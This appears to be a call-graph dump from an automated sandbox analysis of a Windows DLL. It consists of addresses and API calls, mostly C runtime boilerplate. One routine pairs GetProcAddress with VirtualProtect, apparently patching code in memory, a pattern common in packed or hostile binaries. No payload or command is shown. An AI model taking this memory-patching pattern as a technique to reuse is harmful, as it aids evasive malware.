100047dc 5998->6009 6000 100047d1 _abort 6000->5982 6002 10002ae3 6001->6002 6003 10002ae5 IsProcessorFeaturePresent 6001->6003 6002->5984 6005 10002b58 6003->6005 6013 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6005->6013 6007 10002c3b 6007->5984 6008->5998 6012 100056b9 RtlLeaveCriticalSection 6009->6012 6011 100047e3 6011->6000 6012->6011 6013->6007 6017 10005b7a GetLastError 6014->6017 6018 10005b93 6017->6018 6019 10005b99 6017->6019 6036 10005e08 6018->6036 6024 10005bf0 SetLastError 6019->6024 6043 1000637b 6019->6043 6023 10005bb3 6050 1000571e 6023->6050 6025 10005bf9 6024->6025 6025->5989 6029 10005bb9 6031 10005be7 SetLastError 6029->6031 6030 10005bcf 6063 1000593c 6030->6063 6031->6025 6034 1000571e _free 17 API calls 6035 10005be0 6034->6035 6035->6024 6035->6031 6068 10005c45 6036->6068 6038 10005e2f 6039 10005e47 TlsGetValue 6038->6039 6040 10005e3b 6038->6040 6039->6040 6041 10002ada _ValidateLocalCookies 5 API calls 6040->6041 6042 10005e58 6041->6042 6042->6019 6048 10006388 _abort 6043->6048 6044 100063c8 6047 10006368 _free 19 API calls 6044->6047 6045 100063b3 RtlAllocateHeap 6046 10005bab 6045->6046 6045->6048 6046->6023 6056 10005e5e 6046->6056 6047->6046 6048->6044 6048->6045 6049 1000474f _abort 7 API calls 6048->6049 6049->6048 6051 10005752 _free 6050->6051 6052 10005729 HeapFree 6050->6052 6051->6029 6052->6051 6053 1000573e 6052->6053 6054 10006368 _free 18 API calls 6053->6054 6055 10005744 GetLastError 6054->6055 6055->6051 6057 10005c45 _abort 5 API calls 6056->6057 6058 10005e85 6057->6058 6059 10005ea0 TlsSetValue 6058->6059 6060 10005e94 6058->6060 6059->6060 6061 10002ada _ValidateLocalCookies 5 API calls 6060->6061 6062 10005bc8 6061->6062 6062->6023 6062->6030 6074 10005914 6063->6074 6069 10005c71 6068->6069 6070 10005c75 __crt_fast_encode_pointer 6068->6070 6069->6070 6071 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6069->6071 6073 10005c95 6069->6073 6070->6038 6071->6069 6072 10005ca1 GetProcAddress 6072->6070 6073->6070 6073->6072 6075 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6074->6075 6076 10005938 6075->6076 6077 100058c4 6076->6077 6078 10005758 _abort 20 API calls 6077->6078 6079 100058e8 6078->6079 6079->6034 6081 10001ca6 _strlen 6080->6081 6081->5976 7606 100020db 7609 100020e7 ___DestructExceptionObject 7606->7609 7607 100020f6 7608 10002110 dllmain_raw 7608->7607 7610 1000212a 7608->7610 7609->7607 7609->7608 7614 1000210b 7609->7614 7619 10001eec 7610->7619 7612 10002177 7612->7607 7613 10001eec 31 API calls 7612->7613 7615 1000218a 7613->7615 7614->7607 7614->7612 7617 10001eec 31 API calls 7614->7617 7615->7607 7616 10002193 dllmain_raw 7615->7616 7616->7607 7618 1000216d dllmain_raw 7617->7618 7618->7612 7620 10001ef7 7619->7620 7621 10001f2a dllmain_crt_process_detach 7619->7621 7622 10001f1c dllmain_crt_process_attach 7620->7622 7623 10001efc 7620->7623 7628 10001f06 7621->7628 7622->7628 7624 10001f01 7623->7624 7625 10001f12 7623->7625 7624->7628 7629 1000240b 7624->7629 7634 100023ec 7625->7634 7628->7614 7642 100053e5 7629->7642 7735 10003513 7634->7735 7637 100023f5 7637->7628 7640 10002408 7640->7628 7641 1000351e 7 API calls 7641->7637 7648 10005aca 7642->7648 7645 1000351e 7724 10003820 7645->7724 7647 10002415 7647->7628 7649 10005ad4 7648->7649 7650 10002410 7648->7650 7651 10005e08 _abort 11 API calls 7649->7651 7650->7645 7652 10005adb 7651->7652 7652->7650 7653 10005e5e _abort 11 API calls 7652->7653 7654 10005aee 7653->7654 7656 100059b5 7654->7656 7657 100059c0 7656->7657 7661 100059d0 7656->7661 7662 100059d6 7657->7662 7660 1000571e _free 20 API calls 7660->7661 7661->7650 7663 100059e9 7662->7663 7666 100059ef 7662->7666 7664 1000571e _free 20 API calls 7663->7664 7664->7666 7665 1000571e _free 20 API calls 7667 100059fb 7665->7667 7666->7665 7668 1000571e _free 20 API calls 7667->7668 7669 10005a06 7668->7669 7670 1000571e _free 20 API calls 7669->7670 7671 10005a11 7670->7671 7672 1000571e _free 20 API calls 7671->7672 7673 10005a1c 7672->7673 7674 1000571e _free 20 API calls 7673->7674 7675 10005a27 7674->7675 7676 1000571e _free 20 API calls 7675->7676 7677 10005a32 7676->7677 7678 1000571e _free 20 API calls 7677->7678 7679 10005a3d 7678->7679 7680 1000571e _free 20 API calls 7679->7680 7681 10005a48 7680->7681 7682 1000571e _free 20 API calls 7681->7682 7683 10005a56 7682->7683 7688 1000589c 7683->7688 7694 100057a8 7688->7694 7690 100058c0 7691 100058ec 7690->7691 7707 10005809 7691->7707 7693 10005910 7693->7660 7695 100057b4 ___DestructExceptionObject 7694->7695 7702 10005671 RtlEnterCriticalSection 7695->7702 7698 100057be 7699 1000571e _free 20 API calls 7698->7699 7700 100057e8 7698->7700 7699->7700 7703 100057fd 7700->7703 7701 100057f5 _abort 7701->7690 7702->7698 7706 100056b9 RtlLeaveCriticalSection 7703->7706 7705 10005807 7705->7701 7706->7705 7708 10005815 ___DestructExceptionObject 7707->7708 7715 10005671 RtlEnterCriticalSection 7708->7715 7710 1000581f 7716 10005a7f 7710->7716 7712 10005832 7720 10005848 7712->7720 7714 10005840 _abort 7714->7693 7715->7710 7717 10005ab5 __fassign 7716->7717 7718 10005a8e __fassign 7716->7718 7717->7712 7718->7717 7719 10007cc2 __fassign 20 API calls 7718->7719 7719->7717 7723 100056b9 RtlLeaveCriticalSection 7720->7723 7722 10005852 7722->7714 7723->7722 7725 1000384b ___vcrt_freefls@4 7724->7725 7727 1000382d 7724->7727 7725->7647 7726 1000383b 7729 10003ba2 ___vcrt_FlsSetValue 6 API calls 7726->7729 7727->7726 7730 10003b67 7727->7730 7729->7725 7731 10003a82 try_get_function 5 API calls 7730->7731 7732 10003b81 7731->7732 7733 10003b99 TlsGetValue 7732->7733 7734 10003b8d 7732->7734 7733->7734 7734->7726 7741 10003856 7735->7741 7737 100023f1 7737->7637 7738 100053da 7737->7738 7739 10005b7a _abort 20 API calls 7738->7739 7740 100023fd 7739->7740 7740->7640 7740->7641 7742 10003862 GetLastError 7741->7742 7743 1000385f 7741->7743 7744 10003b67 ___vcrt_FlsGetValue 6 API calls 7742->7744 7743->7737 7745 10003877 7744->7745 7746 100038dc SetLastError 7745->7746 7747 10003ba2 ___vcrt_FlsSetValue 6 API calls 7745->7747 7752 10003896 7745->7752 7746->7737 7748 10003890 7747->7748 7749 100038b8 7748->7749 7750 10003ba2 ___vcrt_FlsSetValue 6 API calls 7748->7750 7748->7752 7751 10003ba2 ___vcrt_FlsSetValue 6 API calls 7749->7751 7749->7752 7750->7749 7751->7752 7752->7746 6128 1000281c 6131 10002882 6128->6131 6134 10003550 6131->6134 6133 1000282a 6135 1000358a 6134->6135 6136 1000355d 6134->6136 6135->6133 6136->6135 6137 100047e5 ___std_exception_copy 21 API calls 6136->6137 6138 1000357a 6137->6138 6138->6135 6140 1000544d 6138->6140 6141 1000545a 6140->6141 6143 10005468 6140->6143 6141->6143 6147 1000547f 6141->6147 6142 10006368 _free 20 API calls 6144 10005470 6142->6144 6143->6142 6149 100062ac 6144->6149 6146 1000547a 6146->6135 6147->6146 6148 10006368 _free 20 API calls 6147->6148 6148->6144 6152 10006231 6149->6152 6151 100062b8 6151->6146 6153 10005b7a _abort 20 API calls 6152->6153 6154 10006247 6153->6154 6155 100062a6 6154->6155 6158 10006255 6154->6158 6163 100062bc IsProcessorFeaturePresent 6155->6163 6157 100062ab 6159 10006231 ___std_exception_copy 26 API calls 6157->6159 6160 10002ada _ValidateLocalCookies 5 API calls 6158->6160 6161 100062b8 6159->6161 6162 1000627c 6160->6162 6161->6151 6162->6151 6164 100062c7 6163->6164 6167 100060e2 6164->6167 6168 100060fe ___scrt_fastfail 6167->6168 6169 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6168->6169 6172 100061fb ___scrt_fastfail 6169->6172 6170 10002ada _ValidateLocalCookies 5 API calls 6171 10006219 GetCurrentProcess TerminateProcess 6170->6171 6171->6157 6172->6170 7753 10004bdd 7754 10004c08 7753->7754 7755 10004bec 7753->7755 7757 10006d60 51 API calls 7754->7757 7755->7754 7756 10004bf2 7755->7756 7758 10006368 _free 20 API calls 7756->7758 7759 10004c0f GetModuleFileNameA 7757->7759 7760 10004bf7 7758->7760 7761 10004c33 7759->7761 7762 100062ac ___std_exception_copy 26 API calls 7760->7762 7776 10004d01 7761->7776 7763 10004c01 7762->7763 7768 10004c72 7771 10004d01 38 API calls 7768->7771 7769 10004c66 7770 10006368 _free 20 API calls 7769->7770 7775 10004c6b 7770->7775 7773 10004c88 7771->7773 7772 1000571e _free 20 API calls 7772->7763 7774 1000571e _free 20 API calls 7773->7774 7773->7775 7774->7775 7775->7772 7778 10004d26 7776->7778 7780 10004d86 7778->7780 7788 100070eb 7778->7788 7779 10004c50 7782 10004e76 7779->7782 7780->7779 7781 100070eb 38 API calls 7780->7781 7781->7780 7783 10004e8b 7782->7783 7784 10004c5d 7782->7784 7783->7784 7785 1000637b _abort 20 API calls 7783->7785 7784->7768 7784->7769 7786 10004eb9 7785->7786 7787 1000571e _free 20 API calls 7786->7787 7787->7784 7791 10007092 7788->7791 7792 100054a7 __fassign 38 API calls 7791->7792 7793 100070a6 7792->7793 7793->7778 7152 10007260 GetStartupInfoW 7153 10007286 7152->7153 7155 10007318 7152->7155 7153->7155 7158 10008be3 7153->7158 7156 100072af 7156->7155 7157 100072dd GetFileType 7156->7157 7157->7156 7159 10008bef ___DestructExceptionObject 7158->7159 7160 10008c13 7159->7160 7161 10008bfc 7159->7161 7171 10005671 RtlEnterCriticalSection 7160->7171 7162 10006368 _free 20 API calls 7161->7162 7164 10008c01 7162->7164 7165 100062ac ___std_exception_copy 26 API calls 7164->7165 7166 10008c0b _abort 7165->7166 7166->7156 7167 10008c4b 7179 10008c72 7167->7179 7169 10008c1f 7169->7167 7172 10008b34 7169->7172 7171->7169 7173 1000637b _abort 20 API calls 7172->7173 7174 10008b46 7173->7174 7177 10005eb7 11 API calls 7174->7177 7178 10008b53 7174->7178 7175 1000571e _free 20 API calls 7176 10008ba5 7175->7176 7176->7169 7177->7174 7178->7175 7182 100056b9 RtlLeaveCriticalSection 7179->7182 7181 10008c79 7181->7166 7182->7181 7446 100081a0 7447 100081d9 7446->7447 7448 100081dd 7447->7448 7459 10008205 7447->7459 7449 10006368 _free 20 API calls 7448->7449 7450 100081e2 7449->7450 7452 100062ac ___std_exception_copy 26 API calls 7450->7452 7451 10008529 7453 10002ada _ValidateLocalCookies 5 API calls 7451->7453 7454 100081ed 7452->7454 7455 10008536 7453->7455 7456 10002ada _ValidateLocalCookies 5 API calls 7454->7456 7458 100081f9 7456->7458 7459->7451 7460 100080c0 7459->7460 7461 100080db 7460->7461 7462 10002ada _ValidateLocalCookies 5 API calls 7461->7462 7463 10008152 7462->7463 7463->7459 7794 1000a1e0 7797 1000a1fe 7794->7797 7796 1000a1f6 7799 1000a203 7797->7799 7798 1000aa53 21 API calls 7801 1000a42f 7798->7801 7799->7798 7800 1000a298 7799->7800 7800->7796 7801->7796 7183 10009d61 7184 10009d81 7183->7184 7187 10009db8 7184->7187 7186 10009dab 7189 10009dbf 7187->7189 7188 10009e20 7190 1000a90e 7188->7190 7191 1000aa17 21 API calls 7188->7191 7189->7188 7193 10009ddf 7189->7193 7190->7186 7192 10009e6e 7191->7192 7192->7186 7193->7190 7194 1000aa17 21 API calls 7193->7194 7195 1000a93e 7194->7195 7195->7186 7464 100021a1 ___scrt_dllmain_exception_filter 5824 1000c7a7 5825 1000c7be 5824->5825 5831 1000c82c 5824->5831 5825->5831 5836 1000c7e6 GetModuleHandleA 5825->5836 5827 1000c835 GetModuleHandleA 5830 1000c83f 5827->5830 5828 1000c872 5829 1000c7dd 5829->5830 5829->5831 5833 1000c800 GetProcAddress 5829->5833 5830->5831 5832 1000c85f GetProcAddress 5830->5832 5831->5827 5831->5828 5831->5830 5832->5831 5833->5831 5834 1000c80d VirtualProtect 5833->5834 5834->5831 5835 1000c81c VirtualProtect 5834->5835 5835->5831 5837 1000c7ef 5836->5837 5845 1000c82c 5836->5845 5848 1000c803 GetProcAddress 5837->5848 5839 1000c7f4 5842 1000c800 GetProcAddress 5839->5842 5839->5845 5840 1000c872 5841 1000c835 GetModuleHandleA 5844 1000c83f 5841->5844 5843 1000c80d VirtualProtect 5842->5843 5842->5845 5843->5845 5846 1000c81c VirtualProtect 5843->5846 5844->5845 5847 1000c85f GetProcAddress 5844->5847 5845->5840 5845->5841 5845->5844 5846->5845 5847->5845 5849 1000c82c 5848->5849 5850 1000c80d VirtualProtect 5848->5850 5852 1000c872 5849->5852 5853 1000c835 GetModuleHandleA 5849->5853 5850->5849 5851 1000c81c VirtualProtect 5850->5851 5851->5849 5855 1000c83f 5853->5855 5854 1000c85f GetProcAddress 5854->5855 5855->5849 5855->5854 6173 1000742b 6174 10007430 6173->6174 6175 10007453 6174->6175 6177 10008bae 6174->6177 6178 10008bdd 6177->6178 6179 10008bbb 6177->6179 6178->6174 6180 10008bd7 6179->6180 6181 10008bc9 RtlDeleteCriticalSection 6179->6181 6182 1000571e _free 20 API calls 6180->6182 6181->6180 6181->6181 6182->6178 7196 1000ac6b 7197 1000ac84 __startOneArgErrorHandling 7196->7197 7199 1000acad __startOneArgErrorHandling 7197->7199 7200 1000b2f0 7197->7200 7201 1000b329 __startOneArgErrorHandling 7200->7201 7202 1000b5c1 __raise_exc RaiseException 7201->7202 7203 1000b350 __startOneArgErrorHandling 7201->7203 7202->7203 7204 1000b393 7203->7204 7205 1000b36e 7203->7205 7206 1000b8b2 __startOneArgErrorHandling 20 API calls 7204->7206 7211 1000b8e1 7205->7211 7208 1000b38e __startOneArgErrorHandling 7206->7208 7209 10002ada _ValidateLocalCookies 5 API calls 7208->7209 7210 1000b3b7 7209->7210 7210->7199 7212 1000b8f0 7211->7212 7213 1000b90f __startOneArgErrorHandling 7212->7213 7214 1000b964 __startOneArgErrorHandling 7212->7214 7215 100078a3 __startOneArgErrorHandling 5 API calls 7213->7215 7216 1000b8b2 __startOneArgErrorHandling 20 API calls 7214->7216 7217 1000b950 7215->7217 7219 1000b95d 7216->7219 7218 1000b8b2 __startOneArgErrorHandling 20 API calls 7217->7218 7217->7219 7218->7219 7219->7208 7465 100060ac 7466 100060b7 7465->7466 7468 100060dd 7465->7468 7467 100060c7 FreeLibrary 7466->7467 7466->7468 7467->7466 7220 1000506f 7221 10005081 7220->7221 7222 10005087 7220->7222 7223 10005000 20 API calls 7221->7223 7223->7222 6183 10005630 6184 1000563b 6183->6184 6186 10005664 6184->6186 6188 10005660 6184->6188 6189 10005eb7 6184->6189 6196 10005688 6186->6196 6190 10005c45 _abort 5 API calls 6189->6190 6191 10005ede 6190->6191 6192 10005efc InitializeCriticalSectionAndSpinCount 6191->6192 6195 10005ee7 6191->6195 6192->6195 6193 10002ada _ValidateLocalCookies 5 API calls 6194 10005f13 6193->6194 6194->6184 6195->6193 6197 100056b4 6196->6197 6198 10005695 6196->6198 6197->6188 6199 1000569f RtlDeleteCriticalSection 6198->6199 6199->6197 6199->6199 7224 10003370 7235 10003330 7224->7235 7236 10003342 7235->7236 7237 1000334f 7235->7237 7238 10002ada _ValidateLocalCookies 5 API calls 7236->7238 7238->7237 7802 100063f0 7803 10006400 7802->7803 7806 10006416 7802->7806 7804 10006368 _free 20 API calls 7803->7804 7805 10006405 7804->7805 7808 100062ac ___std_exception_copy 26 API calls 7805->7808 7809 10006480 7806->7809 7814 10006561 7806->7814 7821 10006580 7806->7821 7807 10004e76 20 API calls 7810 100064e5 7807->7810 7816 1000640f 7808->7816 7809->7807 7812 100064ee 7810->7812 7818 10006573 7810->7818 7832 100085eb 7810->7832 7813 1000571e _free 20 API calls 7812->7813 7813->7814 7841 1000679a 7814->7841 7819 100062bc ___std_exception_copy 11 API calls 7818->7819 7820 1000657f 7819->7820 7822 1000658c 7821->7822 7822->7822 7823 1000637b _abort 20 API calls 7822->7823 7824 100065ba 7823->7824 7825 100085eb 26 API calls 7824->7825 7826 100065e6 7825->7826 7827 100062bc ___std_exception_copy 11 API calls 7826->7827 7828 10006615 ___scrt_fastfail 7827->7828 7829 100066b6 FindFirstFileExA 7828->7829 7830 10006705 7829->7830 7831 10006580 26 API calls 7830->7831 7835 1000853a 7832->7835 7833 1000854f 7834 10006368 _free 20 API calls 7833->7834 7836 10008554 7833->7836 7840 1000857a 7834->7840 7835->7833 7835->7836 7838 1000858b 7835->7838 7836->7810 7837 100062ac ___std_exception_copy 26 API calls 7837->7836 7838->7836 7839 10006368 _free 20 API calls 7838->7839 7839->7840 7840->7837 7845 100067a4 7841->7845 7842 100067b4 7844 1000571e _free 20 API calls 7842->7844 7843 1000571e _free 20 API calls 7843->7845 7846 100067bb 7844->7846 7845->7842 7845->7843 7846->7816 7239 10009e71 7240 10009e95 7239->7240 7241 10009ee6 7240->7241 7243 10009f71 __startOneArgErrorHandling 7240->7243 7244 10009ef8 7241->7244 7247 1000aa53 7241->7247 7245 1000b2f0 21 API calls 7243->7245 7246 1000acad __startOneArgErrorHandling 7243->7246 7245->7246 7248 1000aa70 RtlDecodePointer 7247->7248 7249 1000aa80 7247->7249 7248->7249 7250 1000ab0d 7249->7250 7253 1000ab02 7249->7253 7255 1000aab7 7249->7255 7250->7253 7254 10006368 _free 20 API calls 7250->7254 7251 10002ada _ValidateLocalCookies 5 API calls 7252 1000ac67 7251->7252 7252->7244 7253->7251 7254->7253 7255->7253 7256 10006368 _free 20 API calls 7255->7256 7256->7253 7473 10003eb3 7474 10005411 38 API calls 7473->7474 7475 10003ebb 7474->7475 6200 1000543d 6201 10005440 6200->6201 6204 100055a8 6201->6204 6215 10007613 6204->6215 6207 100055b8 6209 100055c2 IsProcessorFeaturePresent 6207->6209 6214 100055e0 6207->6214 6211 100055cd 6209->6211 6212 100060e2 _abort 8 API calls 6211->6212 6212->6214 6245 10004bc1 6214->6245 6248 10007581 6215->6248 6218 1000766e 6219 1000767a _abort 6218->6219 6220 10005b7a _abort 20 API calls 6219->6220 6221 100076a1 _abort 6219->6221 6225 100076a7 _abort 6219->6225 6220->6221 6222 100076f3 6221->6222 6221->6225 6244 100076d6 6221->6244 6223 10006368 _free 20 API calls 6222->6223 6224 100076f8 6223->6224 6227 100062ac ___std_exception_copy 26 API calls 6224->6227 6230 1000771f 6225->6230 6262 10005671 RtlEnterCriticalSection 6225->6262 6227->6244 6231 1000777e 6230->6231 6233 10007776 6230->6233 6241 100077a9 6230->6241 6263 100056b9 RtlLeaveCriticalSection 6230->6263 6231->6241 6264 10007665 6231->6264 6236 10004bc1 _abort 28 API calls 6233->6236 6236->6231 6240 10007665 _abort 38 API calls 6240->6241 6267 1000782e 6241->6267 6242 1000780c 6243 10005af6 _abort 38 API calls 6242->6243 6242->6244 6243->6244 6291 1000bdc9 6244->6291 6295 1000499b 6245->6295 6251 10007527 6248->6251 6250 100055ad 6250->6207 6250->6218 6252 10007533 ___DestructExceptionObject 6251->6252 6257 10005671 RtlEnterCriticalSection 6252->6257 6254 10007541 6258 10007575 6254->6258 6256 10007568 _abort 6256->6250 6257->6254 6261 100056b9 RtlLeaveCriticalSection 6258->6261 6260 1000757f 6260->6256 6261->6260 6262->6230 6263->6233 6265 10005af6 _abort 38 API calls 6264->6265 6266 1000766a 6265->6266 6266->6240 6268 10007834 6267->6268 6269 100077fd 6267->6269 6294 100056b9 RtlLeaveCriticalSection 6268->6294 6269->6242 6269->6244 6271 10005af6 GetLastError 6269->6271 6272 10005b12 6271->6272 6273 10005b0c 6271->6273 6275 1000637b _abort 20 API calls 6272->6275 6277 10005b61 SetLastError 6272->6277 6274 10005e08 _abort 11 API calls 6273->6274 6274->6272 6276 10005b24 6275->6276 6278 10005b2c 6276->6278 6279 10005e5e _abort 11 API calls 6276->6279 6277->6242 6280 1000571e _free 20 API calls 6278->6280 6281 10005b41 6279->6281 6282 10005b32 6280->6282 6281->6278 6283 10005b48 6281->6283 6284 10005b6d SetLastError 6282->6284 6285 1000593c _abort 20 API calls 6283->6285 6287 100055a8 _abort 35 API calls 6284->6287 6286 10005b53 6285->6286 6288 1000571e _free 20 API calls 6286->6288 6289 10005b79 6287->6289 6290 10005b5a 6288->6290 6290->6277 6290->6284 6292 10002ada _ValidateLocalCookies 5 API calls 6291->6292 6293 1000bdd4 6292->6293 6293->6293 6294->6269 6296 100049a7 _abort 6295->6296 6303 100049bf 6296->6303 6317 10004af5 GetModuleHandleW 6296->6317 6300 10004a65 6334 10004aa5 6300->6334 6326 10005671 RtlEnterCriticalSection 6303->6326 6305 10004a3c 6307 10004a54 6305->6307 6330 10004669 6305->6330 6306 100049c7 6306->6300 6306->6305 6327 1000527a 6306->6327 6313 10004669 _abort 5 API calls 6307->6313 6308 10004a82 6337 10004ab4 6308->6337 6309 10004aae 6311 1000bdc9 _abort 5 API calls 6309->6311 6316 10004ab3 6311->6316 6313->6300 6318 100049b3 6317->6318 6318->6303 6319 10004b39 GetModuleHandleExW 6318->6319 6320 10004b63 GetProcAddress 6319->6320 6321 10004b78 6319->6321 6320->6321 6322 10004b95 6321->6322 6323 10004b8c FreeLibrary 6321->6323 6324 10002ada _ValidateLocalCookies 5 API calls 6322->6324 6323->6322 6325 10004b9f 6324->6325 6325->6303 6326->6306 6345 10005132 6327->6345 6331 10004698 6330->6331 6332 10002ada _ValidateLocalCookies 5 API calls 6331->6332 6333 100046c1 6332->6333 6333->6307 6367 100056b9 RtlLeaveCriticalSection 6334->6367 6336 10004a7e 6336->6308 6336->6309 6368 10006025 6337->6368 6340 10004ae2 6343 10004b39 _abort 8 API calls 6340->6343 6341 10004ac2 GetPEB 6341->6340 6342 10004ad2 GetCurrentProcess TerminateProcess 6341->6342 6342->6340 6344 10004aea ExitProcess 6343->6344 6348 100050e1 6345->6348 6347 10005156 6347->6305 6349 100050ed ___DestructExceptionObject 6348->6349 6356 10005671 RtlEnterCriticalSection 6349->6356 6351 100050fb 6357 1000515a 6351->6357 6355 10005119 _abort 6355->6347 6356->6351 6360 10005182 6357->6360 6361 1000517a 6357->6361 6358 10002ada _ValidateLocalCookies 5 API calls 6359 10005108 6358->6359 6363 10005126 6359->6363 6360->6361 6362 1000571e _free 20 API calls 6360->6362 6361->6358 6362->6361 6366 100056b9 RtlLeaveCriticalSection 6363->6366 6365 10005130 6365->6355 6366->6365 6367->6336 6369 10006040 6368->6369 6370 1000604a 6368->6370 6372 10002ada _ValidateLocalCookies 5 API calls 6369->6372 6371 10005c45 _abort 5 API calls 6370->6371 6371->6369 6373 10004abe 6372->6373 6373->6340 6373->6341 6374 10001f3f 6375 10001f4b ___DestructExceptionObject 6374->6375 6392 1000247c 6375->6392 6377 10001f52 6378 10002041 6377->6378 6379 10001f7c 6377->6379 6386 10001f57 ___scrt_is_nonwritable_in_current_image 6377->6386 6415 10002639 IsProcessorFeaturePresent 6378->6415 6403 100023de 6379->6403 6382 10002048 6383 10001f8b __RTC_Initialize 6383->6386 6406 100022fc RtlInitializeSListHead 6383->6406 6385 10001f99 ___scrt_initialize_default_local_stdio_options 6407 100046c5 6385->6407 6390 10001fb8 6390->6386 6391 10004669 _abort 5 API calls 6390->6391 6391->6386 6393 10002485 6392->6393 6419 10002933 IsProcessorFeaturePresent 6393->6419 6397 1000249a 6397->6377 6398 10002496 6398->6397 6430 100053c8 6398->6430 6401 100024b1 6401->6377 6504 100024b5 6403->6504 6405 100023e5 6405->6383 6406->6385 6408 100046dc 6407->6408 6409 10002ada _ValidateLocalCookies 5 API calls 6408->6409 6410 10001fad 6409->6410 6410->6386 6411 100023b3 6410->6411 6412 100023b8 ___scrt_release_startup_lock 6411->6412 6413 10002933 ___isa_available_init IsProcessorFeaturePresent 6412->6413 6414 100023c1 6412->6414 6413->6414 6414->6390 6416 1000264e ___scrt_fastfail 6415->6416 6417 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6416->6417 6418 10002744 ___scrt_fastfail 6417->6418 6418->6382 6420 10002491 6419->6420 6421 100034ea 6420->6421 6422 100034ef ___vcrt_initialize_winapi_thunks 6421->6422 6441 10003936 6422->6441 6426 10003505 6427 10003510 6426->6427 6455 10003972 6426->6455 6427->6398 6429 100034fd 6429->6398 6496 10007457 6430->6496 6433 10003529 6434 10003532 6433->6434 6435 10003543 6433->6435 6436 1000391b ___vcrt_uninitialize_ptd 6 API calls 6434->6436 6435->6397 6437 10003537 6436->6437 6438 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6437->6438 6439 1000353c 6438->6439 6500 10003c50 6439->6500 6442 1000393f 6441->6442 6444 10003968 6442->6444 6445 100034f9 6442->6445 6459 10003be0 6442->6459 6446 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6444->6446 6445->6429 6447 100038e8 6445->6447 6446->6445 6477 10003af1 6447->6477 6450 100038fd 6450->6426 6453 10003918 6453->6426 6456 1000399c 6455->6456 6457 1000397d 6455->6457 6456->6429 6458 10003987 RtlDeleteCriticalSection 6457->6458 6458->6456 6458->6458 6464 10003a82 6459->6464 6461 10003bfa 6462 10003c18 InitializeCriticalSectionAndSpinCount 6461->6462 6463 10003c03 6461->6463 6462->6463 6463->6442 6465 10003aa6 __crt_fast_encode_pointer 6464->6465 6466 10003aaa 6464->6466 6465->6461 6466->6465 6470 100039be 6466->6470 6469 10003ac4 GetProcAddress 6469->6465 6475 100039cd try_get_first_available_module 6470->6475 6471 10003a77 6471->6465 6471->6469 6472 100039ea LoadLibraryExW 6473 10003a05 GetLastError 6472->6473 6472->6475 6473->6475 6474 10003a60 FreeLibrary 6474->6475 6475->6471 6475->6472 6475->6474 6476 10003a38 LoadLibraryExW 6475->6476 6476->6475 6478 10003a82 try_get_function 5 API calls 6477->6478 6479 10003b0b 6478->6479 6480 10003b24 TlsAlloc 6479->6480 6481 100038f2 6479->6481 6481->6450 6482 10003ba2 6481->6482 6483 10003a82 try_get_function 5 API calls 6482->6483 6484 10003bbc 6483->6484 6485 10003bd7 TlsSetValue 6484->6485 6486 1000390b 6484->6486 6485->6486 6486->6453 6487 1000391b 6486->6487 6488 1000392b 6487->6488 6489 10003925 6487->6489 6488->6450 6491 10003b2c 6489->6491 6492 10003a82 try_get_function 5 API calls 6491->6492 6493 10003b46 6492->6493 6494 10003b5e TlsFree 6493->6494 6495 10003b52 6493->6495 6494->6495 6495->6488 6499 10007470 6496->6499 6497 10002ada _ValidateLocalCookies 5 API calls 6498 100024a3 6497->6498 6498->6401 6498->6433 6499->6497 6501 10003c7f 6500->6501 6502 10003c59 6500->6502 6501->6435 6502->6501 6503 10003c69 FreeLibrary 6502->6503 6503->6502 6505 100024c4 6504->6505 6506 100024c8 6504->6506 6505->6405 6507 10002639 ___scrt_fastfail 4 API calls 6506->6507 6509 100024d5 ___scrt_release_startup_lock 6506->6509 6508 10002559 6507->6508 6509->6405 7476 100067bf 7481 100067f4 7476->7481 7479 100067db 7480 1000571e _free 20 API calls 7480->7479 7482 10006806 7481->7482 7491 100067cd 7481->7491 7483 10006836 7482->7483 7484 1000680b 7482->7484 7483->7491 7492 100071d6 7483->7492 7485 1000637b _abort 20 API calls 7484->7485 7487 10006814 7485->7487 7488 1000571e _free 20 API calls 7487->7488 7488->7491 7489 10006851 7490 1000571e _free 20 API calls 7489->7490 7490->7491 7491->7479 7491->7480 7493 100071e1 7492->7493 7494 10007209 7493->7494 7495 100071fa 7493->7495 7498 10007218 7494->7498 7501 10008a98 7494->7501 7496 10006368 _free 20 API calls 7495->7496 7500 100071ff ___scrt_fastfail 7496->7500 7508 10008acb 7498->7508 7500->7489 7502 10008aa3 7501->7502 7503 10008ab8 RtlSizeHeap 7501->7503 7504 10006368 _free 20 API calls 7502->7504 7503->7498 7505 10008aa8 7504->7505 7506 100062ac ___std_exception_copy 26 API calls 7505->7506 7507 10008ab3 7506->7507 7507->7498 7509 10008ae3 7508->7509 7510 10008ad8 7508->7510 7512 10008aeb 7509->7512 7518 10008af4 _abort 7509->7518 7511 100056d0 21 API calls 7510->7511 7517 10008ae0 7511->7517 7515 1000571e _free 20 API calls 7512->7515 7513 10008af9 7516 10006368 _free 20 API calls 7513->7516 7514 10008b1e RtlReAllocateHeap 7514->7517 7514->7518 7515->7517 7516->7517 7517->7500 7518->7513 7518->7514 7519 1000474f _abort 7 API calls 7518->7519 7519->7518 7847 10005bff 7855 10005d5c 7847->7855 7850 10005c13 7851 10005b7a _abort 20 API calls 7852 10005c1b 7851->7852 7853 10005c28 7852->7853 7854 10005c2b 11 API calls 7852->7854 7854->7850 7856 10005c45 _abort 5 API calls 7855->7856 7857 10005d83 7856->7857 7858 10005d9b TlsAlloc 7857->7858 7859 10005d8c 7857->7859 7858->7859 7860 10002ada _ValidateLocalCookies 5 API calls 7859->7860 7861 10005c09 7860->7861 7861->7850 7861->7851

                                                    Executed Functions

                                                    Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
